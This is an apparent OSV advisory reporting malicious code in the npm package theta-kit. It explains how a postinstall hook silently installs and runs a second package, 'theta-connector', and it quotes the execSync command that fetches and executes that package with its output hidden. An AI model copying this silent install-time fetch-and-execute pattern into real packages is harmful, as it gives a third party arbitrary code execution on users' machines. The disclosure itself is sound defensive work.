OSV-MAL-2026-5706

Malicious code in theta-kit (npm)

--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (09b0737ff5b0b0768e2314b014529b80609632a38dfdc3a9ad6cfd6ab1da9039) package.json declares `postinstall: node dist/index.js`, and dist/index.js executes `Model.resetor()` at module top level — meaning both `npm install theta-kit` and `require('theta-kit')` hand control to a separate package, 'theta-connector'. resetor() instantiates `new ThetaConnector({})` and calls `db.queryDBConnect()`. If 'theta-connector' is not present, the catch branch silently runs `execSync('npm install theta-connector --no-warnings --no-save --no-progress --loglevel silent')` and then `require`s and executes it. The package that ultimately runs is not shipped in this tarball, so its bytes can change at any time without any update to theta-kit. Output is suppressed and errors are swallowed, hiding the fetch-and-execute from the installer. The package also declares a runtime dependency on `child_process@^1.0.2`, an unrelated registry placeholder sharing a name with Node's built-in module — a confusion pattern that adds a second installer-controlled execution surface. The install-time fetch-and-execute pattern, combined with the silent-self-install fallback and the unrelated 'child_process' registry dep, is unrelated to the package's advertised mobx in-memory DB purpose and gives the maintainer of 'theta-connector' arbitrary code execution on every install or require of theta-kit.